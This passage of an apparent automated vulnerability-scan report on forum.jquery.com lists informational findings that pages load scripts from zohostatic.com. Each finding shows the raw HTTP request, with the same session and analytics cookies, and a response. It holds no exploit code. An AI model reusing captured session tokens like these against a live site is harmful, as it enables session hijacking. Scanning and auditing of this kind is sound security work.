Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.2. http://forum.jquery.com/developing-jquery-mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developing-jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BE61E18B27FEA85612DE309D854DEEBD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.3. http://forum.jquery.com/developing-jquery-plugins

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=31A3A3697572135978EA43A4B3445CA3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.4. http://forum.jquery.com/jquery-conferences

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E9EAA61A3D158993FEA0827C700963BF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.5. http://forum.jquery.com/jquery-mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=146CD0CCDD0B8E3BD799AAF98F5C892D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:29 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.6. http://forum.jquery.com/qunit-and-testing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E5466414448844E9BCAEB960C7DE0267; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.7. http://forum.jquery.com/subscribeRegister.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /subscribeRegister.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscribeRegister.do?serviceurl=%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&referrer=signUp&forumGroupId=14737000000003003 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AB288D1FDFBEFEC561E9A4E52A70F5E1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equi
...[SNIP]...
<link href="/getCustomFile.do?fileId=14737000000667636&forumGroupId=14737000000003003" type="text/css" rel="stylesheet">

<script src = "http://js.zohostatic.com/discussions/v6/js/jquery-1.3.1.min.js" type = "text/javascript" language = "javascript"></script>
...[SNIP]...

6.8. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=ECE9699A2EDA73BBD1A86295BA681CEC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.9. http://forum.jquery.com/topic/looking-for-help-on-panel-development

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=824525F306F33D1A660A41D747B3C3C5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:19 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.10. http://forum.jquery.com/user/andrew_powell

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/andrew_powell HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=16C254095C2124D65EE64E94307DBCA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:14 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.11. http://forum.jquery.com/user/charlietfl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/charlietfl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/charlietfl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=59CEF57F096606606E0C367A9D77EDCB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.12. http://forum.jquery.com/user/christophe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/christophe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/christophe HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DA6C6F3D4597C88D4576CA4F90C364C0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:46 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.13. http://forum.jquery.com/user/escape164

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/escape164

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/escape164 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:22:49 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.14. http://forum.jquery.com/user/jeresig

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/jeresig

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/jeresig HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.15. http://forum.jquery.com/user/joern.zaefferer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/joern.zaefferer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/joern.zaefferer HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:11 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.16. http://forum.jquery.com/user/kbwood.au

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/kbwood.au

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/kbwood.au HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E6A0387222674E9994B5F79EBEB4FA46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.17. http://forum.jquery.com/user/malsup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/malsup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/malsup HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:18 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.18. http://forum.jquery.com/user/scottjehl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /user/scottjehl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/scottjehl HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
